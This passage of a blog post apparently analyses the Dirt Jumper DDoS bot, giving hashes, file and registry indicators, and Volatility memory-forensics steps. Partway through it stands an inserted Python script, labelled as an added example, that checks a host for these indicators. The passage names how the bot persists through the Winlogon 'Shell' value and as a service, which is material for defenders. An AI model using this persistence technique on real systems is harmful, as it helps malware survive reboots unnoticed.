this allowed us to find more examples and prompted further research. Dirt Jumper is proving to be as popular as the <a href="http://www.shadowserver.org/wiki/pmwiki.php/Calendar/20110123">Darkness/Optima bot we described earlier this year</a> and is gaining more buyers in the underground market due to its easy implementation and powerful attack methods.</span></div><hr /><div></div><div><span style="font-size: small;"> </span><br />
<b><span class="Apple-style-span" style="font-size: large;"><u>Table of Contents</u></span></b><br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; text-align: right;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWhJz90hb9pYGbHBI3_H0XPTd7_qS0vrAq9xbakEbSMUQj0LhjaLi-LvnBySkkP1zfy0gQdx8NhIKp4-I0fu7aJxWBES_VxRjHlh3339AjVzDy65W-d4epE_aJbRt_Q0xnrNwdhSD04QoZ/s1600/944djs.jpg" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="168" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWhJz90hb9pYGbHBI3_H0XPTd7_qS0vrAq9xbakEbSMUQj0LhjaLi-LvnBySkkP1zfy0gQdx8NhIKp4-I0fu7aJxWBES_VxRjHlh3339AjVzDy65W-d4epE_aJbRt_Q0xnrNwdhSD04QoZ/s320/944djs.jpg" width="320" /></a></td></tr>
<tr align="right"><td class="tr-caption">September version control panel. Shopworld.biz</td></tr>
</tbody></table><ol><li>Binary analysis<span style="font-size: small;"><br />
MD5 F29B1089B3F5E076D4D4BD2A3A02D3CB</span></li>
<li>Memory analysis using Volatility 2.0<span style="font-size: small;"><br />
MD5 F29B1089B3F5E076D4D4BD2A3A02D3CB</span></li>
<li>Command & Control servers<span style="font-size: small;"><br />
MD5 F29B1089B3F5E076D4D4BD2A3A02D3CB</span></li>
<li>Dirt Jumper current versions and general information</li>
<li>Review of other samples, command and control servers and DDoS actor groups</li>
</ol></div><div><br />
<hr /><div><span style="font-size: small;"><span style="font-size: large;"><b>1. Binary analysis and comparison</b></span></span><br />
<span style="font-size: small;"><span style="font-size: large;"><b>MD5 F29B1089B3F5E076D4D4BD2A3A02D3CB </b></span></span><br />
</div><br />
<div><span style="font-size: small;">There are two ways that Dirt Jumper gets installed on a system: one, as a service, and two, by adding the malicious binary name to the "Shell=" value in the registry under HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon. Installation as a service is more common and is the default method for versions 1-3 and the September 2011 version. Some private and custom versions of Dirt Jumper use the Explorer shell method.</span><br />
<br />
<div><br />
<div style="text-align: center;"><span style="font-size: small;"><b>INSTALLATION TYPE 1 - </b></span><br />
<span style="font-size: small;"><b>REGISTRY - WINLOGON - "SHELL=" MODIFICATION</b></span></div><br />
<a href="http://asert.arbornetworks.com/2011/08/dirt-jumper-caught/" rel="bookmark" title="Permanent Link: Dirt Jumper Caught in the Act">As seen in <i>Dirt Jumper Caught in the Act - Arbor Networks</i></a></div><div><span style="font-size: small;">Size: 204800</span><br />
<span style="font-size: small;">MD5: F7C0314FB0FBD52AF9D4D721B2C897A2 </span><br />
<br />
<div style="text-align: center;"></div></div><div><div style="text-align: left;"><blockquote><blockquote><blockquote style="color: black;"><blockquote><blockquote style="background-color: #cccccc;"><div style="background-color: #d0e0e3;"><span style="font-size: small;"><b>Company Name</b> Comma Stone</span></div><div style="background-color: #d0e0e3;"><span style="font-size: small;"><b>File Description </b>Signs Blast Egypt Avery</span></div><div style="background-color: #d0e0e3;"><span style="font-size: small;"><b>File Version</b> <b>InternalName</b> Wolff Diets Cowboy Mig</span></div><div style="background-color: #d0e0e3;"><span style="font-size: small;"><b>Legal Copyright </b>Copyright Sobs Sift 1997-2011</span></div><div style="background-color: #d0e0e3;"><span style="font-size: small;"><b>Original Filename</b> Baby.exe</span></div><div style="background-color: #d0e0e3;"><span style="font-size: small;"><b>Product Name</b> Picks Air</span></div><div style="background-color: #d0e0e3;"><span style="font-size: small;"><b>Product Version </b>VarFileInfo</span></div></blockquote></blockquote></blockquote></blockquote></blockquote><div style="text-align: center;"><span style="font-size: small;"><span style="font-size: x-small;">File properties</span></span></div></div><div align="left"><span style="font-size: small;"><br />
</span><br />
<span style="font-size: small;">The following system changes may indicate the presence of this bot</span></div><ul style="margin-bottom: 0px; margin-top: 0px;" type="disc"><li><span style="font-size: small;"> <div align="left">The presence of the following files:<br />
<ul><li><i><system folder>\</i><b>svdhalp.exe</b></li>
<li><i><system folder>\</i><b>svdhalp.exe</b><b>.ini</b></li>
<li><i><Windir>\</i><b>syskey2i.drv </b> - contains nothing but a 15 digit bot id number</li>
</ul>In subkey: <i>HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon</i></div><div align="left">Sets value: "<i>Shell</i>" with data: <b>"<i>explorer.exe, svdhalp.exe</i>"</b><br />
</div></span></li>
</ul></div></div></div><div style="text-align: center;"><span style="font-size: small;"><b>INSTALLATION TYPE 2 - </b></span><br />
<span style="font-size: small;"><b>AS A SERVICE </b></span></div><span style="font-size: small;">Size: 276480 </span><span style="font-size: small;"> </span><br />
<span style="font-size: small;">MD5 F29B1089B3F5E076D4D4BD2A3A02D3CB</span><br />
<div class="detailSectionPadding contentText"><div><div align="left"><div style="text-align: center;"><br />
<blockquote><blockquote><blockquote><blockquote><blockquote style="background-color: #cccccc;"><div style="background-color: #d0e0e3; text-align: left;"><span style="font-size: small;"><span style="color: black;"><b>CompanyName </b>Ohokls Vwivanl</span></span></div><div style="background-color: #d0e0e3; text-align: left;"><span style="font-size: small;"><span style="color: black;"><b>File Description</b> Ohokls Uanvbnmsel Qukxwdrb</span></span></div><div style="background-color: #d0e0e3; text-align: left;"><span style="font-size: small;"><span style="color: black;"><b>File Version </b>25, 34, 66, 19 <b>InternalName</b> Ohokls</span></span></div><div style="background-color: #d0e0e3; text-align: left;"><span style="font-size: small;"><span style="color: black;"><b>Legal Copyrigh</b>t Copyright Ohokls Vwivanl 1997-2011</span></span></div><div style="background-color: #d0e0e3; text-align: left;"><span style="font-size: small;"><span style="color: black;"><b>Original Filename </b>Ohokls.exe <b>Product Name </b>Ohokls Uanvbnmsel<span style="color: black;"> Qukxwdrb<b> VarFileInfo</b></span></span></span></div></blockquote></blockquote></blockquote></blockquote></blockquote></div></div></div></div></div><div style="text-align: center;"><span style="font-size: x-small;">File properties</span></div><div style="font-family: Verdana,sans-serif;"><div style="text-align: center;"></div><br />
The following system changes may indicate the presence of this bot</div><ul style="font-family: Verdana,sans-serif; margin-bottom: 0px; margin-top: 0px;" type="disc"><span style="font-size: small;">
<li> <div align="left">The presence of the following files:<br />
<ul><li><i><system folder>\drivers\<b>svgtook.exe</b></i> - file name varies, often starting with "sv" (e.g. svflooje.exe, svcgoow.exe)</li>
<li><i><Windir>\<b>keys.ini</b></i> - contains nothing but a 15 digit bot id number</li>
</ul></div></li>
<li> <div align="left">The presence of registry modifications such as the following examples (the name of the file may vary):</div><div align="left">HKLM\SYSTEM\CurrentControlSet\Services\<b><i>svgtook</i></b><br />
HKLM\SYSTEM\CurrentControlSet\Services\<b><i>svgtook\Security</i></b><br />
HKLM\SYSTEM\CurrentControlSet\Services\<b><i>svgtook\Enum</i></b></div></li>
</span></ul><div style="font-family: Verdana,sans-serif;"><span style="font-size: small;">The traffic pattern:</span><br />
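Before looking at the traffic, here is a host-side triage check for the installation artifacts of both types listed above (the Winlogon "Shell" modification, the sv*.exe service binary under the drivers folder, and the 15-digit bot id marker files). It is an added example, not code from this post: the indicator names come from the lists above, the registry and file collection uses only the standard Python winreg/os modules and runs on Windows only, and the sample data in the main block is constructed.

```python
"""Host triage for the Dirt Jumper installation artifacts listed above.

Added example, not code from the DeepEnd Research post. It covers the two
persistence methods the post describes (Type 1: an extra executable appended
to the Winlogon "Shell" value; Type 2: a service whose sv*.exe binary sits
under the drivers folder) plus the 15-digit bot-id marker files
(syskey2i.drv, keys.ini). The decision functions are pure and run on any
OS; live collection through winreg is attempted only on Windows.
"""
import os
import re
import sys
from pathlib import PureWindowsPath
from typing import Dict, List

# Indicator names taken from the post; the service binary name varies.
TYPE1_FILES = {"svdhalp.exe", "svdhalp.exe.ini"}
BOT_ID_FILES = {"syskey2i.drv", "keys.ini"}
BOT_ID_RE = re.compile(r"^\d{15}$")
SERVICE_BINARY_RE = re.compile(r"^sv[a-z]+\.exe$", re.IGNORECASE)
WINLOGON_KEY = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"


def shell_value_extras(shell_value: str) -> List[str]:
    """Entries in a Winlogon Shell value other than explorer.exe.

    A clean value is exactly "explorer.exe"; Type 1 turns it into
    "explorer.exe, svdhalp.exe", so every extra entry is reported.
    """
    entries = [e.strip() for e in shell_value.split(",") if e.strip()]
    return [e for e in entries if e.lower() != "explorer.exe"]


def looks_like_bot_id_file(content: bytes) -> bool:
    """True when a file holds nothing but a 15-digit number."""
    return bool(BOT_ID_RE.match(content.decode("ascii", "replace").strip()))


def suspicious_service_binary(image_path: str) -> bool:
    """True for a service ImagePath that is an sv*.exe directly in drivers\\.

    Legitimate content there is almost entirely .sys files, so this is a
    triage hint to confirm by hash, not proof on its own.
    """
    p = PureWindowsPath(image_path.strip().strip('"'))
    return p.parent.name.lower() == "drivers" and bool(SERVICE_BINARY_RE.match(p.name))


def triage(shell_values: Dict[str, str], files: Dict[str, bytes],
           service_images: Dict[str, str]) -> List[str]:
    """Run every check over collected data (hive -> Shell data, path -> bytes,
    service name -> ImagePath) and return human-readable findings."""
    findings = []
    for hive, value in shell_values.items():
        for extra in shell_value_extras(value):
            findings.append(f"{hive} Winlogon Shell carries an extra entry: {extra}")
    for path, content in files.items():
        name = PureWindowsPath(path).name.lower()
        if name in TYPE1_FILES:
            findings.append(f"Type 1 indicator file present: {path}")
        if name in BOT_ID_FILES and looks_like_bot_id_file(content):
            findings.append(f"15-digit bot-id marker file: {path}")
    for svc, image in service_images.items():
        if suspicious_service_binary(image):
            findings.append(f"service {svc} runs sv*.exe from drivers\\: {image}")
    return findings


def collect_windows() -> List[str]:
    """Live collection; the winreg module exists only on Windows."""
    import winreg
    shells = {}
    for hive_name, hive in (("HKLM", winreg.HKEY_LOCAL_MACHINE),
                            ("HKCU", winreg.HKEY_CURRENT_USER)):
        try:
            with winreg.OpenKey(hive, WINLOGON_KEY) as k:
                shells[hive_name] = str(winreg.QueryValueEx(k, "Shell")[0])
        except OSError:
            pass  # no Shell value in this hive (normal for HKCU)
    windir = os.environ.get("WINDIR", r"C:\Windows")
    files = {}
    for cand in (rf"{windir}\keys.ini", rf"{windir}\syskey2i.drv",
                 rf"{windir}\system32\svdhalp.exe", rf"{windir}\system32\svdhalp.exe.ini"):
        if os.path.isfile(cand):
            with open(cand, "rb") as fh:
                files[cand] = fh.read()
    services = {}
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"SYSTEM\CurrentControlSet\Services") as root:
        for i in range(winreg.QueryInfoKey(root)[0]):
            svc = winreg.EnumKey(root, i)
            try:
                with winreg.OpenKey(root, svc) as k:
                    services[svc] = str(winreg.QueryValueEx(k, "ImagePath")[0])
            except OSError:
                pass  # service key without an ImagePath value
    return triage(shells, files, services)


if __name__ == "__main__":
    if sys.platform == "win32":
        results = collect_windows()
    else:  # constructed sample data mirroring the post's indicator lists
        results = triage(
            {"HKLM": "explorer.exe", "HKCU": "explorer.exe, svdhalp.exe"},
            {r"C:\Windows\syskey2i.drv": b"123456789012345\r\n"},
            {"svgtook": r"C:\Windows\system32\drivers\svgtook.exe",
             "Dhcp": r"C:\Windows\system32\svchost.exe -k netsvcs"},
        )
    print("\n".join(results) or "no Dirt Jumper indicators found")
```

The Shell check is the most durable of the three: it flags any value other than a bare explorer.exe regardless of what the appended binary is called, whereas the file and service names above change between builds and are only a starting point.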
<br />
<br />
<table border="0" cellpadding="0" cellspacing="0" style="text-align: left; width: 100%;"><tbody>
<tr> <td style="text-align: left;"><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTMEdgtgmi3FBcWFKN_pHkNz_Mc7mpkz8t3WFldzI-21GKEnnb2Tgm5UQ7bHT4YRn4lNS4ee4YImkloXwvNN_Y9rKbWCwYQln36h8pBBVO8QbmuN07nhpsLtBeHoCFm9qNOxHze9tGjgY0/s1600/stream2.JPG" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTMEdgtgmi3FBcWFKN_pHkNz_Mc7mpkz8t3WFldzI-21GKEnnb2Tgm5UQ7bHT4YRn4lNS4ee4YImkloXwvNN_Y9rKbWCwYQln36h8pBBVO8QbmuN07nhpsLtBeHoCFm9qNOxHze9tGjgY0/s320/stream2.JPG" width="312" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Traffic components</td></tr>
</tbody></table></td> <td><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzFy3QZYnI-RxCVVM17fGXhNk68sifs3uPRokdFHzkUkCd1WcBb2Y6zqWoImGVx68fdWmkE1DUxB7WHvolFU3T_nkCRXRMzojoXPk2HiSj7BM_mY-SAHeVIw4D0fZFoDEZBuvUvdPaSjx7/s1600/stream_content.jpg" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="350" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzFy3QZYnI-RxCVVM17fGXhNk68sifs3uPRokdFHzkUkCd1WcBb2Y6zqWoImGVx68fdWmkE1DUxB7WHvolFU3T_nkCRXRMzojoXPk2HiSj7BM_mY-SAHeVIw4D0fZFoDEZBuvUvdPaSjx7/s400/stream_content.jpg" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Stream Content</td></tr>
</tbody></table></td> </tr>
</tbody> </table><span style="font-size: small;"> </span> </div><div style="font-family: Verdana,sans-serif; text-align: center;"><span style="font-size: small;">As can be seen below, the two binaries show slight modifications of the same bot.</span><br />
<br />
<span style="font-size: small;"> </span></div><div style="font-family: Verdana,sans-serif;"><span style="font-size: small;"> </span> </div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="font-family: Verdana,sans-serif; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAXfzL_K-1irkbprbIiFXAn_yFf7x-3nyJipOTWp6Z_Ap53l0WiO24kE1FPugjiCscU6cstjdUP3VNteka-vZXAQxOk3y0i6e2dk-vZW5W545K21B0O3CAPEWEh8M2XUkE3Rlv_JWu6Xf6/s1600/Comparisonof2.png" style="margin-left: auto; margin-right: auto;"><img border="0" height="568" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAXfzL_K-1irkbprbIiFXAn_yFf7x-3nyJipOTWp6Z_Ap53l0WiO24kE1FPugjiCscU6cstjdUP3VNteka-vZXAQxOk3y0i6e2dk-vZW5W545K21B0O3CAPEWEh8M2XUkE3Rlv_JWu6Xf6/s640/Comparisonof2.png" width="640" /></a></span></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><b><span style="font-size: small;">Comparison of two Dirt Jumper binaries</span></b><br />
<b><span style="font-size: small;"></span></b></td></tr>
</tbody></table><div style="font-family: Verdana,sans-serif;"><span style="font-size: small;">The current IDS signatures for Dirt Jumper can be modified to match this additional version; the bot ID field seems to be the most consistent common denominator across versions, while the C&C URLs and bot commands vary somewhat.</span><br />
<span style="font-size: small;"> </span> <span style="font-size: small;"> </span> </div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="font-family: Verdana,sans-serif; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlL9palfAJqH5jkcLIZKReps-Kkh4BtyRQ9o6fQUE3fhcsAaof2CvTD6NldyIgKYMR6HJLcCfFYK6Sr2eq5cYs31s8uv6P1Ap3NT9ZjNRCz9TeCKgPvI_8zKw5_2D1qPTteUJ8o9D8bs9z/s1600/signature.png" style="margin-left: auto; margin-right: auto;"><img border="0" height="266" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlL9palfAJqH5jkcLIZKReps-Kkh4BtyRQ9o6fQUE3fhcsAaof2CvTD6NldyIgKYMR6HJLcCfFYK6Sr2eq5cYs31s8uv6P1Ap3NT9ZjNRCz9TeCKgPvI_8zKw5_2D1qPTteUJ8o9D8bs9z/s640/signature.png" width="640" /></a></span></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;">Emerging threats signature as proposed by Kevin Ross</span></td></tr>
</tbody></table><div style="font-family: Verdana,sans-serif;"><span style="font-size: small;"><b> </b></span></div><div style="font-family: Verdana,sans-serif;"><span style="font-size: small;"><b> </b></span></div><div style="font-family: Verdana,sans-serif;"><span style="font-size: small;"><b> </b></span></div><div style="font-family: Verdana,sans-serif;"><hr /><span style="font-size: small;"> </span> <span style="font-size: small;"><b> </b></span><br />
<span style="font-size: large;"><b>2. Memory Analysis using Volatility 2.0 </b></span><br />
<span style="font-size: large;"><b> MD5 F29B1089B3F5E076D4D4BD2A3A02D3CB</b></span><br />
<br />
</div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">I've now routinely adopted the use of Volatility as a key tool in any malware analysis that I do. Volatility is described as "a completely open collection of tools.....for the extraction of digital artifacts from volatile memory (RAM) samples". Volatility's ease of use, especially in obtaining basic forensic information that may shed a quick light on the analyzed specimen, makes it an indispensable tool. Version 2.1 Alpha was recently released, so I used this to analyze the Dirt Jumper binary </span><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">f29b1089b3f5e076d4d4bd2a3a02d3cb.</span></span><br />
<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><br />
I executed the malware in my sandbox lab under VMWare Version 7. One of the things I like about VMWare is that you can easily obtain a memory snapshot by suspending the virtual machine, and copying the .vmem file to your analysis directory. That .vmem file is an exact representation of the virtual machine's memory image. If you are not using VMWare, you can also easily snap memory via the <a href="http://www.moonsols.com/windows-memory-toolkit/">MoonSols Windows Memory Toolkit.</a></span></span><br />
<br />
<span class="Apple-style-span" style="font-family: Verdana,sans-serif;">The first step in any analysis using Volatility is to get information about the image. This is done via the '<a href="http://code.google.com/p/volatility/wiki/CommandReference#imageinfo">imageinfo</a>' command as seen below.</span><br />
<span class="Apple-style-span" style="font-family: Verdana,sans-serif;"> </span><br />
<br />
<div face="Verdana,sans-serif"></div><div face="Verdana,sans-serif"></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" face="Verdana,sans-serif" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHg-GMaT22Pbohcxh2SwcT66Ou3ileddUocSyeduF-69ijm6U6sqTwgBWaSx7utT97m5zn1L-L2ggAcnkqN74vaPKj9WXacxklFUirkHIft9ZpmxVGTux51qnoy9ZP8WDpnXOOsr5mdvQ/s1600/imageinfo.jpg" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHg-GMaT22Pbohcxh2SwcT66Ou3ileddUocSyeduF-69ijm6U6sqTwgBWaSx7utT97m5zn1L-L2ggAcnkqN74vaPKj9WXacxklFUirkHIft9ZpmxVGTux51qnoy9ZP8WDpnXOOsr5mdvQ/s1600/imageinfo.jpg" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Volatility 'imageinfo' command</td></tr>
</tbody></table><div face="Verdana,sans-serif"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">Notice that the suggested profile is "<b>WinXPSP3x86</b>". We will specify this profile for all subsequent Volatility usage by using the '--profile=' option when invoking Volatility.</span><br />
</div><div face="Verdana,sans-serif"><span style="font-family: Verdana,sans-serif;"> </span></div><div face="Verdana,sans-serif"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">Now we wish to list all the active processes. This is done with the "<a href="http://code.google.com/p/volatility/wiki/CommandReference#pslist">pslist</a>" command. Note the use of the "-P" switch to tell Volatility to display the physical memory offset rather than the virtual offset.</span><br />
<span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><br />
</span><br />
<br />
<div face="Verdana,sans-serif"><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkdBJ0sj0xASdgBUbnjLqjGadfP1o_nwAqSnxtxte3uluebZQeZ3kov-dbfObSecAMMwL7Ub4cg1Ot8OXkqdnZJccgtXbNfpUmlJU_VPp3lUlzxk_mm0EXjZTfvcILVP-1lMgZy1aX_Gc/s1600/pslist.jpg" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkdBJ0sj0xASdgBUbnjLqjGadfP1o_nwAqSnxtxte3uluebZQeZ3kov-dbfObSecAMMwL7Ub4cg1Ot8OXkqdnZJccgtXbNfpUmlJU_VPp3lUlzxk_mm0EXjZTfvcILVP-1lMgZy1aX_Gc/s1600/pslist.jpg" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Volatility 'pslist' command</td></tr>
</tbody></table></div><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">The timestamp indicates the date/time that the process started. Note that all the processes except for 'svgtook.exe' started within a few seconds of 00:12. 'svgtook.exe' has a Process ID (PID) of 1900 and began at 10/05/2011 at 00:14. It should also be noted that in this sandbox run, I initiated the malware execution immediately after booting. Note also that there is no browser process or anything else that should initiate an Internet connection.</span><br />
<span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><br />
I next run the Volatility 'connections' command to see all the active network connections. Note that the large number of remote address connections are all associated with PID 1900.</span><br />
<br />
<span class="Apple-style-span" style="font-family: Verdana,sans-serif;"> </span><br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirLD7C4oBJCCrc9n-unpARM3BrpXaPnvCSuB_F-1n11nsFcLaOREcXn3qSU3Lgvzb44EdABV_QASAVTx7ZUzlzkcz7tjvXtIInRYQBslEagp9FGpNnCNenAB6nIaEa_RfELwZyKoPnhddl/s1600/connections.jpg" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirLD7C4oBJCCrc9n-unpARM3BrpXaPnvCSuB_F-1n11nsFcLaOREcXn3qSU3Lgvzb44EdABV_QASAVTx7ZUzlzkcz7tjvXtIInRYQBslEagp9FGpNnCNenAB6nIaEa_RfELwZyKoPnhddl/s1600/connections.jpg" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Volatility 'connections' command</td></tr>
</tbody></table><div face="Verdana,sans-serif"><span class="Apple-style-span" style="font-family: Verdana,sans-serif;">The Volatility '<a href="http://code.google.com/p/volatility/wiki/CommandReference#sockets">sockets</a>' command will display the listening sockets for any protocol. In the figure below, we see many open sockets for both the UDP and TCP protocol. With one exception, all of these processes are again associated with Process ID 1900, '<b>svgtook.exe</b>'. By virtue of its many open sockets and dozens of outbound connections, Process ID 1900 certainly seems worth a closer look.</span><br />
<span class="Apple-style-span" style="font-family: Verdana,sans-serif;"><br />
</span></div><div face="Verdana,sans-serif"><span class="Apple-style-span"> </span></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="font-family: Verdana,sans-serif; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNAhaPUvP2WMP6JnUXyN8-w_Dubxfm4KQmOWG6gz-GCJVwuDc1WUuqNHjkUvwR2PXChFw86PA24TYqGKaUCoU53ll3bp8mzIkEZFpo5MpAC9olRLlBfhD9GxBdyf2yIYYtzHF4ma1-vvID/s1600/sockets.jpg" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNAhaPUvP2WMP6JnUXyN8-w_Dubxfm4KQmOWG6gz-GCJVwuDc1WUuqNHjkUvwR2PXChFw86PA24TYqGKaUCoU53ll3bp8mzIkEZFpo5MpAC9olRLlBfhD9GxBdyf2yIYYtzHF4ma1-vvID/s1600/sockets.jpg" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Volatility 'sockets' command</td></tr>
</tbody></table><div face="Verdana,sans-serif"><span class="Apple-style-span"> </span></div><div face="Verdana,sans-serif"></div><div face="Verdana,sans-serif" style="font-family: Verdana,sans-serif;"><span class="Apple-style-span">By the way, a great new feature of Volatility 2.0 is the '<a href="http://code.google.com/p/volatility/wiki/CommandReference#netscan">netscan</a>' plugin. This plugin will scan for network connection artifacts in Windows Vista, Windows 2008 Server and Windows 7 memory artifacts. From the <a href="http://code.google.com/p/volatility/wiki/CommandReference#netscan">Volatility wiki</a>, <i>"To scan for network artifacts in Windows Vista, Windows 2008 Server and Windows 7 memory dumps, use the netscan command. This finds TCP endpoints, TCP listeners, UDP endpoints, and UDP listeners. It distinguishes between IPv4 and IPv6, prints the local and remote IP (if applicable), the local and remote port (if applicable), the time when the socket was bound or when the connection was established, and the current state (for TCP connections only)."</i></span></div><div style="font-family: Verdana,sans-serif;"><span class="Apple-style-span"> </span></div><div face="Verdana,sans-serif"><div style="font-family: Verdana,sans-serif;"><span class="Apple-style-span">Since I ran this analysis on a Windows XP system, I'm not able to show you a 'netscan' output for this particular instance. In a follow-up analysis, I'll utilize Volatility under Windows 7.</span><br />
<br />
<span class="Apple-style-span"> </span></div><div style="font-family: Verdana,sans-serif;"></div><div style="font-family: Verdana,sans-serif;">To look more closely at Process 1900, we can dump the process from physical memory. This allows us to examine the process in its executing context as opposed to a packed and possibly obfuscated state. One typical analysis step is to dump the process and use the 'strings' command to look for items of interest. Let's see the result of performing this against our Process 1900. Using the Volatility command '<a href="http://code.google.com/p/volatility/wiki/CommandReference#procmemdump">procmemdump</a>', the <b>'svgtook.exe'</b> process (PID 1900) is dumped to the specified directory. The following image shows this command being run, followed by running strings against the dumped file, and using 'grep' to search for the string "http".<br />
<br />
</div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEge3NbdkZsO6CrIOzXO276oXW85iwLxhaDu8VfaONs8oo_kdf-Ki-vxnWSCeTNh3-R4cavtowJvbBFk9MrGPuXo2h-oq5uGsKOd09qg-S82DBtt5TmQ4b0XiewuNugqIus6keClLZcB97J1/s1600/proc_dump.jpg" style="margin-left: auto; margin-right: auto;"><img border="0" height="410" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEge3NbdkZsO6CrIOzXO276oXW85iwLxhaDu8VfaONs8oo_kdf-Ki-vxnWSCeTNh3-R4cavtowJvbBFk9MrGPuXo2h-oq5uGsKOd09qg-S82DBtt5TmQ4b0XiewuNugqIus6keClLZcB97J1/s640/proc_dump.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Volatility 'procdump' command</td></tr>
</tbody></table><div style="font-family: Verdana,sans-serif;">The results show various strings containing "http" being discovered in the dumped file. These include various legitimate sites, as well as the string 'httpsend_s'.<br />
<br />
</div><div style="font-family: Verdana,sans-serif;"></div><div style="font-family: Verdana,sans-serif;">One of the best ways to discover evidence pertaining to a suspicious process is to dump its Virtual Address Descriptor (VAD) segments and examine them with the 'strings' command. By examining the dumped VAD segments, you get an excellent view of the "live" data associated with the examined process. A good reference for this is the whitepaper, "<a href="http://www.dfrws.org/2007/proceedings/p62-dolan-gavitt.pdf">The VAD tree: A process-eye view of physical memory</a>" by Brendan Dolan-Gavitt. From the whitepaper, "<i>The Virtual Address Descriptor tree is used by the Windows memory manager to describe memory ranges used by a process as they are allocated. When a process allocates memory with VirtualAlloc, the memory manager creates an entry in the VAD tree.</i>" Since I'm particularly interested in any URLs or network connection remnants associated with Process 1900, I'll use the '<a href="http://code.google.com/p/volatility/wiki/CommandReference#vaddump">vaddump</a>' command to dump the VAD memory segments associated with this process.<br />
<br />
</div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
